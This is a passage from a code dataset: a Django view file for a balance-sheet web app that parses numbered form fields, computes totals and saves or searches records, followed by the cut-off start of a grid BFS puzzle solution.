else:\n a44 = float(a44)\n a45 = request.POST.get('a45', '')\n if a45 == '':\n a45 = 0\n else:\n a45 = float(a45)\n a46 = request.POST.get('a46', '')\n if a46 == '':\n a46 = 0\n else:\n a46 = float(a46)\n a47 = request.POST.get('a47', '')\n if a47 == '':\n a47 = 0\n else:\n a47 = float(a47)\n a48 = request.POST.get('a48', '')\n if a48 == '':\n a48 = 0\n else:\n a48 = float(a48)\n a49 = request.POST.get('a49', '')\n if a49 == '':\n a49 = 0\n else:\n a49 = float(a49)\n a50 = request.POST.get('a50', '')\n if a50 == '':\n a50 = 0\n else:\n a50 = float(a50)\n\n a55 = request.POST.get('a55', '')\n if a55 == '':\n a55 = 0\n else:\n a55 = float(a55)\n a56 = request.POST.get('a56', '')\n if a56 == '':\n a56 = 0\n else:\n a56 = float(a56)\n a57 = request.POST.get('a57', '')\n if a57 == '':\n a57 = 0\n else:\n a57 = float(a57)\n a58 = request.POST.get('a58', '')\n if a58 == '':\n a58 = 0\n else:\n a58 = float(a58)\n a59 = request.POST.get('a59', '')\n if a59 == '':\n a59 = 0\n else:\n a59 = float(a59)\n a60 = request.POST.get('a60', '')\n if a60 == '':\n a60 = 0\n else:\n a60 = float(a60)\n a61 = request.POST.get('a61', '')\n if a61 == '':\n a61 = 0\n else:\n a61 = float(a61)\n a62 = request.POST.get('a62', '')\n if a62 == '':\n a62 = 0\n else:\n a62 = float(a62)\n a63 = request.POST.get('a63', '')\n if a63 == '':\n a63 = 0\n else:\n a63 = float(a63)\n a64 = request.POST.get('a64', '')\n if a64 == '':\n a64 = 0\n else:\n a64 = float(a64)\n a65 = request.POST.get('a65', '')\n if a65 == '':\n a65 = 0\n else:\n a65 = float(a65)\n a66 = request.POST.get('a66', '')\n if a66 == '':\n a66 = 0\n else:\n a66 = float(a66)\n a67 = request.POST.get('a67', '')\n if a67 == '':\n a67 = 0\n else:\n a67 = float(a67)\n a68 = request.POST.get('a68', '')\n if a68 == '':\n a68 = 0\n else:\n a68 = float(a68)\n a69 = request.POST.get('a69', '')\n if a69 == '':\n a69 = 0\n else:\n a69 = float(a69)\n a70 = request.POST.get('a70', '')\n if a70 == '':\n a70 = 0\n else:\n a70 = float(a70)\n a71 = request.POST.get('a71', '')\n if a71 == '':\n a71 = 0\n else:\n a71 = float(a71)\n a72 = request.POST.get('a72', '')\n if a72 == '':\n a72 = 0\n else:\n a72 = float(a72)\n a73 = request.POST.get('a73', '')\n if a73 == '':\n a73 = 0\n else:\n a73 = float(a73)\n a74 = request.POST.get('a74', '')\n if a74 == '':\n a74 = 0\n else:\n a74 = float(a74)\n a75 = request.POST.get('a75', '')\n if a75 == '':\n a75 = 0\n else:\n a75 = float(a75)\n a76 = request.POST.get('a76', '')\n if a76 == '':\n a76 = 0\n else:\n a76 = float(a76)\n a77 = request.POST.get('a77', '')\n if a77 == '':\n a77 = 0\n else:\n a77 = float(a77)\n a78 = request.POST.get('a78', '')\n if a78 == '':\n a78 = 0\n else:\n a78 = float(a78)\n a79 = request.POST.get('a79', '')\n if a79 == '':\n a79 = 0\n else:\n a79 = float(a79)\n a80 = request.POST.get('a80', '')\n if a80 == '':\n a80 = 0\n else:\n a80 = float(a80)\n a81 = request.POST.get('a81', '')\n if a81 == '':\n a81 = 0\n else:\n a81 = float(a81)\n a82 = request.POST.get('a82', '')\n if a82 == '':\n a82 = 0\n else:\n a82 = float(a82)\n a83 = request.POST.get('a83', '')\n if a83 == '':\n a83 = 0\n else:\n a83 = float(a83)\n a84 = request.POST.get('a84', '')\n if a84 == '':\n a84 = 0\n else:\n a84 = float(a84)\n a85 = request.POST.get('a85', '')\n if a85 == '':\n a85 = 0\n else:\n a85 = float(a85)\n a86 = request.POST.get('a86', '')\n if a86 == '':\n a86 = 0\n else:\n a86 = float(a86)\n a87 = request.POST.get('a87', '')\n if a87 == '':\n a87 = 0\n else:\n a87 = float(a87)\n a88 = request.POST.get('a88', '')\n if a88 == '':\n a88 = 0\n else:\n a88 = float(a88)\n a89 = request.POST.get('a89', '')\n if a89 == '':\n a89 = 0\n else:\n a89 = float(a89)\n a90 = request.POST.get('a90', '')\n if a90 == '':\n a90 = 0\n else:\n a90 = float(a90)\n a91 = request.POST.get('a91', '')\n if a91 == '':\n a91 = 0\n else:\n a91 = float(a91)\n a92 = request.POST.get('a92', '')\n if a92 == '':\n a92 = 0\n else:\n a92 = float(a92)\n a93 = request.POST.get('a93', '')\n if a93 == '':\n a93 = 0\n else:\n a93 = float(a93)\n a94 = request.POST.get('a94', '')\n if a94 == '':\n a94 = 0\n else:\n a94 = float(a94)\n a95 = request.POST.get('a95', '')\n if a95 == '':\n a95 = 0\n else:\n a95 = float(a95)\n a96 = request.POST.get('a96', '')\n if a96 == '':\n a96 = 0\n else:\n a96 = float(a96)\n a97 = request.POST.get('a97', '')\n if a97 == '':\n a97 = 0\n else:\n a97 = float(a97)\n a98 = request.POST.get('a98', '')\n if a98 == '':\n a98 = 0\n else:\n a98 = float(a98)\n a99 = request.POST.get('a99', '')\n if a99 == '':\n a99 = 0\n else:\n a99 = float(a99)\n a100 = request.POST.get('a100', '')\n if a100 == '':\n a100 = 0\n else:\n a100 = float(a100)\n a101 = request.POST.get('a101', '')\n if a101 == '':\n a101 = 0\n else:\n a101 = float(a101)\n a102 = request.POST.get('a102', '')\n if a102 == '':\n a102 = 0\n else:\n a102 = float(a102)\n a103 = request.POST.get('a103', '')\n if a103 == '':\n a103 = 0\n else:\n a103 = float(a103)\n a104 = request.POST.get('a104', '')\n if a104 == '':\n a104 = 0\n else:\n a104 = float(a104)\n a105 = request.POST.get('a105', '')\n if a105 == '':\n a105 = 0\n else:\n a105 = float(a105)\n a106 = request.POST.get('a106', '')\n if a106 == '':\n a106 = 0\n else:\n a106 = float(a106)\n a107 = request.POST.get('a107', '')\n if a107 == '':\n a107 = 0\n else:\n a107 = float(a107)\n a108 = request.POST.get('a108', '')\n if a108 == '':\n a108 = 0\n else:\n a108 = float(a108)\n a109 = request.POST.get('a109', '')\n if a109 == '':\n a109 = 0\n else:\n a109 = float(a109)\n a110 = request.POST.get('a110', '')\n if a110 == '':\n a110 = 0\n else:\n a110 = float(a110)\n a111 = request.POST.get('a111', '')\n if a111 == '':\n a111 = 0\n else:\n a111 = float(a111)\n a112 = request.POST.get('a112', '')\n if a112 == '':\n a112 = 0\n else:\n a112 = float(a112)\n a113 = request.POST.get('a113', '')\n if a113 == '':\n a113 = 0\n else:\n a113 = float(a113)\n a114 = request.POST.get('a114', '')\n if a114 == '':\n a114 = 0\n else:\n a114 = float(a114)\n a115 = request.POST.get('a115', '')\n if a115 == '':\n a115 = 0\n else:\n a115 = float(a115)\n a116 = request.POST.get('a116', '')\n if a116 == '':\n a116 = 0\n else:\n a116 = float(a116)\n a117 = request.POST.get('a117', '')\n if a117 == '':\n a117 = 0\n else:\n a117 = float(a117)\n a118 = request.POST.get('a118', '')\n if a118 == '':\n a118 = 0\n else:\n a118 = float(a118)\n \n SUMB1 = a5+a9+a13+a17+a21+a25+a29+a33+a37+a41+a45\n SUMC1 = a6+a10+a14+a18+a22+a26+a30+a34+a38+a42+a46\n SUME1 = a7+a11+a15+a19+a23+a27+a31+a35+a39+a43+a47+a49\n SUMF1 = a8+a12+a16+a20+a24+a28+a32+a36+a40+a44+a48+a50\n SUBB1 = a75-a79\n SUBC1 = a76-a80\n SUME2 = a57+a61+a65+a69+a73+a77+a81\n SUMF2 = a58+a62+a66+a70+a74+a78+a82\n SUME3 = SUME1+SUME2\n SUMF3 = SUMF1+SUMF2\n SUBB2 = SUBB1 - a83\n SUBC2 = SUBC1 - a84\n SUME4 = a91+a95+a99+a103+a107+a111\n SUMF4 = a92+a96+a100+a104+a108+a112\n SUMB2 = a63+a67+a71+SUBB2+a85+a89+a93+a97+a101+a105+a109+a113+a115+a117\n SUMC2 = a64+a68+a72+SUBC2+a86+a90+a94+a98+a102+a106+a110+a114+a116+a118\n SUMB3 = SUMB1+SUMB2\n SUMC3 = SUMC1+SUMC2\n SUME5 = SUME3+SUME4\n SUMF5 = SUMF3+SUMF4\n now = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n \n updatesheet = balancesheet.objects.get(id=sheetid)\n updatesheet.date = now\n updatesheet.unit = unit\n updatesheet.SUMB1 = SUMB1\n updatesheet.SUMC1 = SUMC1\n updatesheet.SUME1 = SUME1\n updatesheet.SUMF1 = SUMF1\n updatesheet.SUBB1 = SUBB1\n updatesheet.SUBC1 = SUBC1\n updatesheet.SUME2 = SUME2\n updatesheet.SUMF2 = SUMF2\n updatesheet.SUME3 = SUME3\n updatesheet.SUMF3 = SUMF3\n updatesheet.SUBB2 = SUBB2\n updatesheet.SUBC2 = SUBC2\n updatesheet.SUME4 = SUME4\n updatesheet.SUMF4 = SUMF4\n updatesheet.SUMB2 = SUMB2\n updatesheet.SUMC2 = SUMC2\n updatesheet.SUMB3 = SUMB3\n updatesheet.SUMC3 = SUMC3\n updatesheet.SUME5 = SUME5\n updatesheet.SUMF5 = SUMF5\n updatesheet.unit = unit\n updatesheet.date = now\n updatesheet.a5 = a5\n updatesheet.a6 = a6\n updatesheet.a7 = a7\n updatesheet.a8 = a8\n updatesheet.a9 = a9\n updatesheet.a10 = a10\n updatesheet.a11 = a11\n updatesheet.a12 = a12\n updatesheet.a13 = a13\n updatesheet.a14 = a14\n updatesheet.a15 = a15\n updatesheet.a16 = a16\n updatesheet.a17 = a17\n updatesheet.a18 = a18\n updatesheet.a19 = a19\n updatesheet.a20 = a20\n updatesheet.a21 = a21\n updatesheet.a22 = a22\n updatesheet.a23 = a23\n updatesheet.a24 = a24\n updatesheet.a25 = a25\n updatesheet.a26 = a26\n updatesheet.a27 = a27\n updatesheet.a28 = a28\n updatesheet.a29 = a29\n updatesheet.a30 = a30\n updatesheet.a31 = a31\n updatesheet.a32 = a32\n updatesheet.a33 = a33\n updatesheet.a34 = a34\n updatesheet.a35 = a35\n updatesheet.a36 = a36\n updatesheet.a37 = a37\n updatesheet.a38 = a38\n updatesheet.a39 = a39\n updatesheet.a40 = a40\n updatesheet.a41 = a41\n updatesheet.a42 = a42\n updatesheet.a43 = a43\n updatesheet.a44 = a44\n updatesheet.a45 = a45\n updatesheet.a46 = a46\n updatesheet.a47 = a47\n updatesheet.a48 = a48\n updatesheet.a49 = a49\n updatesheet.a50 = a50\n updatesheet.a55 = a55\n updatesheet.a56 = a56\n updatesheet.a57 = a57\n updatesheet.a58 = a58\n updatesheet.a59 = a59\n updatesheet.a60 = a60\n updatesheet.a61 = a61\n updatesheet.a62 = a62\n updatesheet.a63 = a63\n updatesheet.a64 = a64\n updatesheet.a65 = a65\n updatesheet.a66 = a66\n updatesheet.a67 = a67\n updatesheet.a68 = a68\n updatesheet.a69 = a69\n updatesheet.a70 = a70\n updatesheet.a71 = a71\n updatesheet.a72 = a72\n updatesheet.a73 = a73\n updatesheet.a74 = a74\n updatesheet.a75 = a75\n updatesheet.a76 = a76\n updatesheet.a77 = a77\n updatesheet.a78 = a78\n updatesheet.a79 = a79\n updatesheet.a80 = a80\n updatesheet.a81 = a81\n updatesheet.a82 = a82\n updatesheet.a83 = a83\n updatesheet.a84 = a84\n updatesheet.a85 = a85\n updatesheet.a86 = a86\n updatesheet.a87 = a87\n updatesheet.a88 = a88\n updatesheet.a89 = a89\n updatesheet.a90 = a90\n updatesheet.a91 = a91\n updatesheet.a92 = a92\n updatesheet.a93 = a93\n updatesheet.a94 = a94\n updatesheet.a95 = a95\n updatesheet.a96 = a96\n updatesheet.a97 = a97\n updatesheet.a98 = a98\n updatesheet.a99 = a99\n updatesheet.a100 = a100\n updatesheet.a101 = a101\n updatesheet.a102 = a102\n updatesheet.a103 = a103\n updatesheet.a104 = a104\n updatesheet.a105 = a105\n updatesheet.a106 = a106\n updatesheet.a107 = a107\n updatesheet.a108 = a108\n updatesheet.a109 = a109\n updatesheet.a110 = a110\n updatesheet.a111 = a111\n updatesheet.a112 = a112\n updatesheet.a113 = a113\n updatesheet.a114 = a114\n updatesheet.a115 = a115\n updatesheet.a116 = a116\n updatesheet.a117 = a117\n updatesheet.a118 = a118\n updatesheet.save()\n \n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, 'isupdate':1 })\n\ndef savebalancesheet(request):\n userid = request.POST.get(\"userid\", '')\n \n unit = request.POST.get('unit', '')\n if unit == '':\n unit = ''\n\n a5 = request.POST.get('a5', '')\n if a5 == '':\n a5 = 0\n else:\n a5 = float(a5)\n a6 = request.POST.get('a6', '')\n if a6 == '':\n a6 = 0\n else:\n a6 = float(a6)\n a7 = request.POST.get('a7', '')\n if a7 == '':\n a7 = 0\n else:\n a7 = float(a7)\n a8 = request.POST.get('a8', '')\n if a8 == '':\n a8 = 0\n else:\n a8 = float(a8)\n a9 = request.POST.get('a9', '')\n if a9 == '':\n a9 = 0\n else:\n a9 = float(a9)\n a10 = request.POST.get('a10', '')\n if a10 == '':\n a10 = 0\n else:\n a10 = float(a10)\n a11 = request.POST.get('a11', '')\n if a11 == '':\n a11 = 0\n else:\n a11 = float(a11)\n a12 = request.POST.get('a12', '')\n if a12 == '':\n a12 = 0\n else:\n a12 = float(a12)\n a13 = request.POST.get('a13', '')\n if a13 == '':\n a13 = 0\n else:\n a13 = float(a13)\n a14 = request.POST.get('a14', '')\n if a14 == '':\n a14 = 0\n else:\n a14 = float(a14)\n a15 = request.POST.get('a15', '')\n if a15 == '':\n a15 = 0\n else:\n a15 = float(a15)\n a16 = request.POST.get('a16', '')\n if a16 == '':\n a16 = 0\n else:\n a16 = float(a16)\n a17 = request.POST.get('a17', '')\n if a17 == '':\n a17 = 0\n else:\n a17 = float(a17)\n a18 = request.POST.get('a18', '')\n if a18 == '':\n a18 = 0\n else:\n a18 = float(a18)\n a19 = request.POST.get('a19', '')\n if a19 == '':\n a19 = 0\n else:\n a19 = float(a19)\n a20 = request.POST.get('a20', '')\n if a20 == '':\n a20 = 0\n else:\n a20 = float(a20)\n a21 = request.POST.get('a21', '')\n if a21 == '':\n a21 = 0\n else:\n a21 = float(a21)\n a22 = request.POST.get('a22', '')\n if a22 == '':\n a22 = 0\n else:\n a22 = float(a22)\n a23 = request.POST.get('a23', '')\n if a23 == '':\n a23 = 0\n else:\n a23 = float(a23)\n a24 = request.POST.get('a24', '')\n if a24 == '':\n a24 = 0\n else:\n a24 = float(a24)\n a25 = request.POST.get('a25', '')\n if a25 == '':\n a25 = 0\n else:\n a25 = float(a25)\n a26 = request.POST.get('a26', '')\n if a26 == '':\n a26 = 0\n else:\n a26 = float(a26)\n a27 = request.POST.get('a27', '')\n if a27 == '':\n a27 = 0\n else:\n a27 = float(a27)\n a28 = request.POST.get('a28', '')\n if a28 == '':\n a28 = 0\n else:\n a28 = float(a28)\n a29 = request.POST.get('a29', '')\n if a29 == '':\n a29 = 0\n else:\n a29 = float(a29)\n a30 = request.POST.get('a30', '')\n if a30 == '':\n a30 = 0\n else:\n a30 = float(a30)\n a31 = request.POST.get('a31', '')\n if a31 == '':\n a31 = 0\n else:\n a31 = float(a31)\n a32 = request.POST.get('a32', '')\n if a32 == '':\n a32 = 0\n else:\n a32 = float(a32)\n a33 = request.POST.get('a33', '')\n if a33 == '':\n a33 = 0\n else:\n a33 = float(a33)\n a34 = request.POST.get('a34', '')\n if a34 == '':\n a34 = 0\n else:\n a34 = float(a34)\n a35 = request.POST.get('a35', '')\n if a35 == '':\n a35 = 0\n else:\n a35 = float(a35)\n a36 = request.POST.get('a36', '')\n if a36 == '':\n a36 = 0\n else:\n a36 = float(a36)\n a37 = request.POST.get('a37', '')\n if a37 == '':\n a37 = 0\n else:\n a37 = float(a37)\n a38 = request.POST.get('a38', '')\n if a38 == '':\n a38 = 0\n else:\n a38 = float(a38)\n a39 = request.POST.get('a39', '')\n if a39 == '':\n a39 = 0\n else:\n a39 = float(a39)\n a40 = request.POST.get('a40', '')\n if a40 == '':\n a40 = 0\n else:\n a40 = float(a40)\n a41 = request.POST.get('a41', '')\n if a41 == '':\n a41 = 0\n else:\n a41 = float(a41)\n a42 = request.POST.get('a42', '')\n if a42 == '':\n a42 = 0\n else:\n a42 = float(a42)\n a43 = request.POST.get('a43', '')\n if a43 == '':\n a43 = 0\n else:\n a43 = float(a43)\n a44 = request.POST.get('a44', '')\n if a44 == '':\n a44 = 0\n else:\n a44 = float(a44)\n a45 = request.POST.get('a45', '')\n if a45 == '':\n a45 = 0\n else:\n a45 = float(a45)\n a46 = request.POST.get('a46', '')\n if a46 == '':\n a46 = 0\n else:\n a46 = float(a46)\n a47 = request.POST.get('a47', '')\n if a47 == '':\n a47 = 0\n else:\n a47 = float(a47)\n a48 = request.POST.get('a48', '')\n if a48 == '':\n a48 = 0\n else:\n a48 = float(a48)\n a49 = request.POST.get('a49', '')\n if a49 == '':\n a49 = 0\n else:\n a49 = float(a49)\n a50 = request.POST.get('a50', '')\n if a50 == '':\n a50 = 0\n else:\n a50 = float(a50)\n a55 = request.POST.get('a55', '')\n if a55 == '':\n a55 = 0\n else:\n a55 = float(a55)\n a56 = request.POST.get('a56', '')\n if a56 == '':\n a56 = 0\n else:\n a56 = float(a56)\n a57 = request.POST.get('a57', '')\n if a57 == '':\n a57 = 0\n else:\n a57 = float(a57)\n a58 = request.POST.get('a58', '')\n if a58 == '':\n a58 = 0\n else:\n a58 = float(a58)\n a59 = request.POST.get('a59', '')\n if a59 == '':\n a59 = 0\n else:\n a59 = float(a59)\n a60 = request.POST.get('a60', '')\n if a60 == '':\n a60 = 0\n else:\n a60 = float(a60)\n a61 = request.POST.get('a61', '')\n if a61 == '':\n a61 = 0\n else:\n a61 = float(a61)\n a62 = request.POST.get('a62', '')\n if a62 == '':\n a62 = 0\n else:\n a62 = float(a62)\n a63 = request.POST.get('a63', '')\n if a63 == '':\n a63 = 0\n else:\n a63 = float(a63)\n a64 = request.POST.get('a64', '')\n if a64 == '':\n a64 = 0\n else:\n a64 = float(a64)\n a65 = request.POST.get('a65', '')\n if a65 == '':\n a65 = 0\n else:\n a65 = float(a65)\n a66 = request.POST.get('a66', '')\n if a66 == '':\n a66 = 0\n else:\n a66 = float(a66)\n a67 = request.POST.get('a67', '')\n if a67 == '':\n a67 = 0\n else:\n a67 = float(a67)\n a68 = request.POST.get('a68', '')\n if a68 == '':\n a68 = 0\n else:\n a68 = float(a68)\n a69 = request.POST.get('a69', '')\n if a69 == '':\n a69 = 0\n else:\n a69 = float(a69)\n a70 = request.POST.get('a70', '')\n if a70 == '':\n a70 = 0\n else:\n a70 = float(a70)\n a71 = request.POST.get('a71', '')\n if a71 == '':\n a71 = 0\n else:\n a71 = float(a71)\n a72 = request.POST.get('a72', '')\n if a72 == '':\n a72 = 0\n else:\n a72 = float(a72)\n a73 = request.POST.get('a73', '')\n if a73 == '':\n a73 = 0\n else:\n a73 = float(a73)\n a74 = request.POST.get('a74', '')\n if a74 == '':\n a74 = 0\n else:\n a74 = float(a74)\n a75 = request.POST.get('a75', '')\n if a75 == '':\n a75 = 0\n else:\n a75 = float(a75)\n a76 = request.POST.get('a76', '')\n if a76 == '':\n a76 = 0\n else:\n a76 = float(a76)\n a77 = request.POST.get('a77', '')\n if a77 == '':\n a77 = 0\n else:\n a77 = float(a77)\n a78 = request.POST.get('a78', '')\n if a78 == '':\n a78 = 0\n else:\n a78 = float(a78)\n a79 = request.POST.get('a79', '')\n if a79 == '':\n a79 = 0\n else:\n a79 = float(a79)\n a80 = request.POST.get('a80', '')\n if a80 == '':\n a80 = 0\n else:\n a80 = float(a80)\n a81 = request.POST.get('a81', '')\n if a81 == '':\n a81 = 0\n else:\n a81 = float(a81)\n a82 = request.POST.get('a82', '')\n if a82 == '':\n a82 = 0\n else:\n a82 = float(a82)\n a83 = request.POST.get('a83', '')\n if a83 == '':\n a83 = 0\n else:\n a83 = float(a83)\n a84 = request.POST.get('a84', '')\n if a84 == '':\n a84 = 0\n else:\n a84 = float(a84)\n a85 = request.POST.get('a85', '')\n if a85 == '':\n a85 = 0\n else:\n a85 = float(a85)\n a86 = request.POST.get('a86', '')\n if a86 == '':\n a86 = 0\n else:\n a86 = float(a86)\n a87 = request.POST.get('a87', '')\n if a87 == '':\n a87 = 0\n else:\n a87 = float(a87)\n a88 = request.POST.get('a88', '')\n if a88 == '':\n a88 = 0\n else:\n a88 = float(a88)\n a89 = request.POST.get('a89', '')\n if a89 == '':\n a89 = 0\n else:\n a89 = float(a89)\n a90 = request.POST.get('a90', '')\n if a90 == '':\n a90 = 0\n else:\n a90 = float(a90)\n a91 = request.POST.get('a91', '')\n if a91 == '':\n a91 = 0\n else:\n a91 = float(a91)\n a92 = request.POST.get('a92', '')\n if a92 == '':\n a92 = 0\n else:\n a92 = float(a92)\n a93 = request.POST.get('a93', '')\n if a93 == '':\n a93 = 0\n else:\n a93 = float(a93)\n a94 = request.POST.get('a94', '')\n if a94 == '':\n a94 = 0\n else:\n a94 = float(a94)\n a95 = request.POST.get('a95', '')\n if a95 == '':\n a95 = 0\n else:\n a95 = float(a95)\n a96 = request.POST.get('a96', '')\n if a96 == '':\n a96 = 0\n else:\n a96 = float(a96)\n a97 = request.POST.get('a97', '')\n if a97 == '':\n a97 = 0\n else:\n a97 = float(a97)\n a98 = request.POST.get('a98', '')\n if a98 == '':\n a98 = 0\n else:\n a98 = float(a98)\n a99 = request.POST.get('a99', '')\n if a99 == '':\n a99 = 0\n else:\n a99 = float(a99)\n a100 = request.POST.get('a100', '')\n if a100 == '':\n a100 = 0\n else:\n a100 = float(a100)\n a101 = request.POST.get('a101', '')\n if a101 == '':\n a101 = 0\n else:\n a101 = float(a101)\n a102 = request.POST.get('a102', '')\n if a102 == '':\n a102 = 0\n else:\n a102 = float(a102)\n a103 = request.POST.get('a103', '')\n if a103 == '':\n a103 = 0\n else:\n a103 = float(a103)\n a104 = request.POST.get('a104', '')\n if a104 == '':\n a104 = 0\n else:\n a104 = float(a104)\n a105 = request.POST.get('a105', '')\n if a105 == '':\n a105 = 0\n else:\n a105 = float(a105)\n a106 = request.POST.get('a106', '')\n if a106 == '':\n a106 = 0\n else:\n a106 = float(a106)\n a107 = request.POST.get('a107', '')\n if a107 == '':\n a107 = 0\n else:\n a107 = float(a107)\n a108 = request.POST.get('a108', '')\n if a108 == '':\n a108 = 0\n else:\n a108 = float(a108)\n a109 = request.POST.get('a109', '')\n if a109 == '':\n a109 = 0\n else:\n a109 = float(a109)\n a110 = request.POST.get('a110', '')\n if a110 == '':\n a110 = 0\n else:\n a110 = float(a110)\n a111 = request.POST.get('a111', '')\n if a111 == '':\n a111 = 0\n else:\n a111 = float(a111)\n a112 = request.POST.get('a112', '')\n if a112 == '':\n a112 = 0\n else:\n a112 = float(a112)\n a113 = request.POST.get('a113', '')\n if a113 == '':\n a113 = 0\n else:\n a113 = float(a113)\n a114 = request.POST.get('a114', '')\n if a114 == '':\n a114 = 0\n else:\n a114 = float(a114)\n a115 = request.POST.get('a115', '')\n if a115 == '':\n a115 = 0\n else:\n a115 = float(a115)\n a116 = request.POST.get('a116', '')\n if a116 == '':\n a116 = 0\n else:\n a116 = float(a116)\n a117 = request.POST.get('a117', '')\n if a117 == '':\n a117 = 0\n else:\n a117 = float(a117)\n a118 = request.POST.get('a118', '')\n if a118 == '':\n a118 = 0\n else:\n a118 = float(a118)\n \n \n SUMB1 = a5+a9+a13+a17+a21+a25+a29+a33+a37+a41+a45\n SUMC1 = a6+a10+a14+a18+a22+a26+a30+a34+a38+a42+a46\n SUME1 = a7+a11+a15+a19+a23+a27+a31+a35+a39+a43+a47+a49\n SUMF1 = a8+a12+a16+a20+a24+a28+a32+a36+a40+a44+a48+a50\n SUBB1 = a75-a79\n SUBC1 = a76-a80\n SUME2 = a57+a61+a65+a69+a73+a77+a81\n SUMF2 = a58+a62+a66+a70+a74+a78+a82\n SUME3 = SUME1+SUME2\n SUMF3 = SUMF1+SUMF2\n SUBB2 = SUBB1 - a83\n SUBC2 = SUBC1 - a84\n SUME4 = a91+a95+a99+a103+a107+a111\n SUMF4 = a92+a96+a100+a104+a108+a112\n SUMB2 = a63+a67+a71+SUBB2+a85+a89+a93+a97+a101+a105+a109+a113+a115+a117\n SUMC2 = a64+a68+a72+SUBC2+a86+a90+a94+a98+a102+a106+a110+a114+a116+a118\n SUMB3 = SUMB1+SUMB2\n SUMC3 = SUMC1+SUMC2\n SUME5 = SUME3+SUME4\n SUMF5 = SUMF3+SUMF4 \n now = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n \n\n \n result = usertable.objects.get(userid=userid)\n newbalancesheet = balancesheet(user=result, \\\n SUMB1 = SUMB1, SUMC1 = SUMC1,\\\n SUME1 = SUME1,\\\n unit = unit, \\\n date = now, \\\n SUMF1 = SUMF1,\\\n SUBB1 = SUBB1,\\\n SUBC1 = SUBC1,\\\n SUME2 = SUME2,\\\n SUMF2 = SUMF2,\\\n SUME3 = SUME3,\\\n SUMF3 = SUMF3,\\\n SUBB2 = SUBB2,\\\n SUBC2 = SUBC2,\\\n SUME4 = SUME4,\\\n SUMF4 = SUMF4,\\\n SUMB2 = SUMB2,\\\n SUMC2 = SUMC2,\\\n SUMB3 = SUMB3,\\\n SUMC3 = SUMC3,\\\n SUME5 = SUME5,\\\n SUMF5 = SUMF5,\\\n a5=a5, a6=a6, \\\n a7=a7, a8=a8, \\\n a9=a9, a10=a10, \\\n a11=a11, a12=a12, \\\n a13=a13, a14=a14, \\\n a15=a15, a16=a16, \\\n a17=a17, a18=a18, \\\n a19=a19, a20=a20, \\\n a21=a21, a22=a22, \\\n a23=a23, a24=a24, \\\n a25=a25, a26=a26, \\\n a27=a27, a28=a28, \\\n a29=a29, a30=a30, \\\n a31=a31, a32=a32, \\\n a33=a33, a34=a34, \\\n a35=a35, a36=a36, \\\n a37=a37, a38=a38, \\\n a39=a39, a40=a40, \\\n a41=a41, a42=a42, \\\n a43=a43, a44=a44, \\\n a45=a45, a46=a46, \\\n a47=a47, a48=a48, \\\n a49=a49, a50=a50, \\\n a55=a55, a56=a56, \\\n a57=a57, a58=a58, \\\n a59=a59, a60=a60, \\\n a61=a61, a62=a62, \\\n a63=a63, a64=a64, \\\n a65=a65, a66=a66, \\\n a67=a67, a68=a68, \\\n a69=a69, a70=a70, \\\n a71=a71, a72=a72, \\\n a73=a73, a74=a74, \\\n a75=a75, a76=a76, \\\n a77=a77, a78=a78, \\\n a79=a79, a80=a80, \\\n a81=a81, a82=a82, \\\n a83=a83, a84=a84, \\\n a85=a85, a86=a86, \\\n a87=a87, a88=a88, \\\n a89=a89, a90=a90, \\\n a91=a91, a92=a92, \\\n a93=a93, a94=a94, \\\n a95=a95, a96=a96, \\\n a97=a97, a98=a98, \\\n a99=a99, a100=a100, \\\n a101=a101, a102=a102, \\\n a103=a103, a104=a104, \\\n a105=a105, a106=a106, \\\n a107=a107, a108=a108, \\\n a109=a109, a110=a110, \\\n a111=a111, a112=a112, \\\n a113=a113, a114=a114, \\\n a115=a115, a116=a116, \\\n a117=a117, a118=a118\n )\n newbalancesheet.save()\n \n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"issave\":1 })\n \n#def searchbill(request, userid):\ndef searchbalancesheet(request, userid):\n username = request.POST.get(\"username\", '')\n \n \n selectpeople = request.POST.get(\"selectpeople\", '')\n selecttime = request.POST.get(\"selecttime\", '')\n# peoplename = request.POST.get(\"peoplename\", '')\n unit = request.POST.get(\"unit\", '')\n yearfrom = request.POST.get(\"yearfrom\", '')\n monthfrom = request.POST.get(\"monthfrom\", '')\n dayfrom = request.POST.get(\"dayfrom\", '')\n yearto = request.POST.get(\"yearto\", '')\n monthto = request.POST.get(\"monthto\", '')\n dayto = request.POST.get(\"dayto\", '')\n selectpeople = selectpeople.encode('utf-8') #需要注意编码问题,避免出现ascii的错误\n selecttime = selecttime.encode(\"utf-8\")\n# peoplename = peoplename.encode('utf-8') #这样才能与python内部的编码一起使用\n yearfrom = int(yearfrom)\n monthfrom = int(monthfrom)\n dayfrom = int(dayfrom)\n yearto = int(yearto)\n monthto = int(monthto)\n dayto = int(dayto)\n datefrom = datetime.datetime(yearfrom, monthfrom, dayfrom)\n dateto = datetime.datetime(yearto, monthto, dayto)\n# \n results = balancesheet.objects.filter(user=userid)\n if(selectpeople == \"编制单位\"):\n results = results.filter(unit = unit)\n if(selecttime == \"保存日期\"):\n results = results.filter(date__range=(datefrom, dateto))\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1 })","sub_path":"UserManage/balancesheet.py","file_name":"balancesheet.py","file_ext":"py","file_size_in_byte":54324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83905029","text":"INF=9876543210\r\nfrom collections import deque\r\ndR=(-1,0,1,0)\r\ndC=(0,-1,0,1)\r\nN,M=map(int,input().split())\r\nL=[]\r\nfor i in range(N):\r\n L.append(list(input()))\r\n\r\n\r\ndef bfs(case,q,visited):\r\n while (q):\r\n r, c, to = q.popleft()\r\n if L[r][c] == \"C\":\r\n case.append([visited[r][c][to],r,c,to])\r\n for k in range(4):\r\n if k==to:\r\n continue\r\n tempR = r + dR[k]\r\n tempC = c + dC[k]\r\n if 0 <= tempR < N and 0 <= tempC < M and L[tempR][tempC] != \"#\" and visited[tempR][tempC][k] == 0:\r\n visited[tempR][tempC][k] = visited[r][c][to] + 1\r\n q.append([tempR, tempC, k])\r\n\r\ndef 